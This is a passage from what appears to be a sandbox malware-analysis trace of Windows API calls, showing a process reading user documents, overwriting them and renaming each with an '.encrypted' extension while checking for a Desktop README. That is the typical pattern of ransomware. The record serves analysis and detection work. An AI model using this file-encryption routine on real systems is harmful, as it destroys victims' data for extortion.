returned 1 [0152.988] GetFileType (hFile=0x4d0) returned 0x1 [0152.988] WriteFile (in: hFile=0x4d0, lpBuffer=0x3e100d8*, nNumberOfBytesToWrite=0x18320, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x3e100d8*, lpNumberOfBytesWritten=0x2ee844*=0x18320, lpOverlapped=0x0) returned 1 [0152.991] CloseHandle (hObject=0x4d0) returned 1 [0152.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt", lpFilePart=0x0) returned 0x4a [0152.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt.encrypted", lpFilePart=0x0) returned 0x54 [0152.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0152.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\m6w h-b k11.ppt"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ade00, ftCreationTime.dwHighDateTime=0x1d5d7ac, ftLastAccessTime.dwLowDateTime=0xa1e30870, ftLastAccessTime.dwHighDateTime=0x1d5e2bb, ftLastWriteTime.dwLowDateTime=0x42276fe0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x18320)) returned 1 [0152.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0152.993] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\m6w h-b k11.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\m6w h-b k11.ppt.encrypted")) returned 1 [0152.994] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt", lpFilePart=0x0) returned 0x53 [0152.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\nvogx9 zodj7mv0fno5q.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.995] GetFileType (hFile=0x4d0) returned 0x1 [0152.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.995] GetFileType (hFile=0x4d0) returned 0x1 [0152.995] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x2a7c [0152.995] ReadFile (in: hFile=0x4d0, lpBuffer=0x2383890, nNumberOfBytesToRead=0x2a7c, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x2383890*, lpNumberOfBytesRead=0x2ee854*=0x2a7c, lpOverlapped=0x0) returned 1 [0152.997] CloseHandle (hObject=0x4d0) returned 1 [0153.011] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.011] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.011] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt", lpFilePart=0x0) returned 0x53 [0153.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\nvogx9 zodj7mv0fno5q.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.012] GetFileType (hFile=0x4d0) returned 0x1 [0153.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.012] GetFileType (hFile=0x4d0) returned 0x1 [0153.012] WriteFile (in: hFile=0x4d0, lpBuffer=0x23ddabc*, nNumberOfBytesToWrite=0x2a80, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x23ddabc*, lpNumberOfBytesWritten=0x2ee844*=0x2a80, lpOverlapped=0x0) returned 1 [0153.013] CloseHandle (hObject=0x4d0) returned 1 [0153.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt", lpFilePart=0x0) returned 0x53 [0153.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt.encrypted", lpFilePart=0x0) returned 0x5d [0153.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.014] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\nvogx9 zodj7mv0fno5q.odt"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4416a80, ftCreationTime.dwHighDateTime=0x1d5d8d4, ftLastAccessTime.dwLowDateTime=0x3758e230, ftLastAccessTime.dwHighDateTime=0x1d5df74, ftLastWriteTime.dwLowDateTime=0x422c32a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x2a80)) returned 1 [0153.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.015] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\nvogx9 zodj7mv0fno5q.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\nvogx9 zOdj7mV0Fno5q.odt.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\nvogx9 zodj7mv0fno5q.odt.encrypted")) returned 1 [0153.016] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc", lpFilePart=0x0) returned 0x51 [0153.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\vi5yibcvfs506wd9dn.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.017] GetFileType (hFile=0x4d0) returned 0x1 [0153.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.017] GetFileType (hFile=0x4d0) returned 0x1 [0153.017] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x18ecc [0153.017] ReadFile (in: hFile=0x4d0, lpBuffer=0x3e28418, nNumberOfBytesToRead=0x18ecc, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x3e28418*, lpNumberOfBytesRead=0x2ee854*=0x18ecc, lpOverlapped=0x0) returned 1 [0153.020] CloseHandle (hObject=0x4d0) returned 1 [0153.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.040] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc", lpFilePart=0x0) returned 0x51 [0153.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\vi5yibcvfs506wd9dn.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.041] GetFileType (hFile=0x4d0) returned 0x1 [0153.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.041] GetFileType (hFile=0x4d0) returned 0x1 [0153.041] WriteFile (in: hFile=0x4d0, lpBuffer=0x3ea4e60*, nNumberOfBytesToWrite=0x18ed0, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x3ea4e60*, lpNumberOfBytesWritten=0x2ee844*=0x18ed0, lpOverlapped=0x0) returned 1 [0153.044] CloseHandle (hObject=0x4d0) returned 1 [0153.045] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc", lpFilePart=0x0) returned 0x51 [0153.045] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc.encrypted", lpFilePart=0x0) returned 0x5b [0153.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\vi5yibcvfs506wd9dn.doc"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf38047d0, ftCreationTime.dwHighDateTime=0x1d5df17, ftLastAccessTime.dwLowDateTime=0xc70ca3f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b5, ftLastWriteTime.dwLowDateTime=0x4230f560, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x18ed0)) returned 1 [0153.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\vi5yibcvfs506wd9dn.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\vI5yibCVFS506wd9DN.doc.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\vi5yibcvfs506wd9dn.doc.encrypted")) returned 1 [0153.047] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx", lpFilePart=0x0) returned 0x46 [0153.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\w1n rq.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.047] GetFileType (hFile=0x4d0) returned 0x1 [0153.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.047] GetFileType (hFile=0x4d0) returned 0x1 [0153.047] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x15c76 [0153.048] ReadFile (in: hFile=0x4d0, lpBuffer=0x3ebdd50, nNumberOfBytesToRead=0x15c76, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x3ebdd50*, lpNumberOfBytesRead=0x2ee854*=0x15c76, lpOverlapped=0x0) returned 1 [0153.050] CloseHandle (hObject=0x4d0) returned 1 [0153.071] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.071] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx", lpFilePart=0x0) returned 0x46 [0153.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\w1n rq.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.073] GetFileType (hFile=0x4d0) returned 0x1 [0153.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.073] GetFileType (hFile=0x4d0) returned 0x1 [0153.073] WriteFile (in: hFile=0x4d0, lpBuffer=0x3f2ac08*, nNumberOfBytesToWrite=0x15c80, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x3f2ac08*, lpNumberOfBytesWritten=0x2ee844*=0x15c80, lpOverlapped=0x0) returned 1 [0153.075] CloseHandle (hObject=0x4d0) returned 1 [0153.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx", lpFilePart=0x0) returned 0x46 [0153.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx.encrypted", lpFilePart=0x0) returned 0x50 [0153.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\w1n rq.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43833630, ftCreationTime.dwHighDateTime=0x1d5e219, ftLastAccessTime.dwLowDateTime=0x13cf22c0, ftLastAccessTime.dwHighDateTime=0x1d5df74, ftLastWriteTime.dwLowDateTime=0x4235b820, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x15c80)) returned 1 [0153.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.077] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\w1n rq.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\w1N Rq.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\w1n rq.pptx.encrypted")) returned 1 [0153.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx", lpFilePart=0x0) returned 0x49 [0153.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\xfg7ocmuv.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.079] GetFileType (hFile=0x4d0) returned 0x1 [0153.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.079] GetFileType (hFile=0x4d0) returned 0x1 [0153.079] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x146a6 [0153.079] ReadFile (in: hFile=0x4d0, lpBuffer=0x247b260, nNumberOfBytesToRead=0x146a6, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x247b260*, lpNumberOfBytesRead=0x2ee854*=0x146a6, lpOverlapped=0x0) returned 1 [0153.081] CloseHandle (hObject=0x4d0) returned 1 [0153.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx", lpFilePart=0x0) returned 0x49 [0153.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.125] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\xfg7ocmuv.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.126] GetFileType (hFile=0x4d0) returned 0x1 [0153.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.126] GetFileType (hFile=0x4d0) returned 0x1 [0153.126] WriteFile (in: hFile=0x4d0, lpBuffer=0x230bf44*, nNumberOfBytesToWrite=0x146b0, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x230bf44*, lpNumberOfBytesWritten=0x2ee844*=0x146b0, lpOverlapped=0x0) returned 1 [0153.128] CloseHandle (hObject=0x4d0) returned 1 [0153.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx", lpFilePart=0x0) returned 0x49 [0153.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx.encrypted", 